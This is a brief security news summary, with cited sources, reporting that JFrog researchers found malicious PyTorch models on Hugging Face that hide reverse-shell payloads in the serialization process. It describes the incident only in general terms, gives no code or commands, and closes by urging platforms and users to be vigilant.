JFrog Security Research recently uncovered malicious machine learning models on the Hugging Face AI platform [3], posing a significant security threat by potentially enabling code execution on user machines.

Description

Despite Hugging Face’s security measures [2], such as malware and secrets scanning [3], these harmful models managed to evade detection by embedding malicious code within the trusted serialization process [4]. One instance involved a PyTorch model uploaded by a user named “baller423,” containing a payload capable of establishing a reverse shell connection to a specified host [2]. While some uploads may be part of security research [1] [2] [4], the operators’ actions were deemed risky and inappropriate [2]. The public availability of these dangerous models highlights the need for increased vigilance and proactive measures to safeguard against malicious actors in the AI/ML model ecosystem.

Conclusion

The discovery of these malicious models underscores the importance of enhancing security protocols within AI platforms to prevent similar incidents in the future. It also serves as a reminder for users to exercise caution when interacting with unknown models and to report any suspicious activity promptly. By staying vigilant and implementing robust security measures, the AI community can better protect itself against potential threats and ensure the integrity of its models.

References

[1] https://cyber.vumetric.com/security-news/2024/02/28/malicious-ai-models-on-hugging-face-backdoor-users-machines/
[2] https://ciso2ciso.com/malicious-ai-models-on-hugging-face-backdoor-users-machines-source-www-bleepingcomputer-com/
[3] https://www.darkreading.com/application-security/hugging-face-ai-platform-100-malicious-code-execution-models
[4] https://bestofai.com/article/malicious-ai-models-on-hugging-face-backdoor-usersrsquo-machines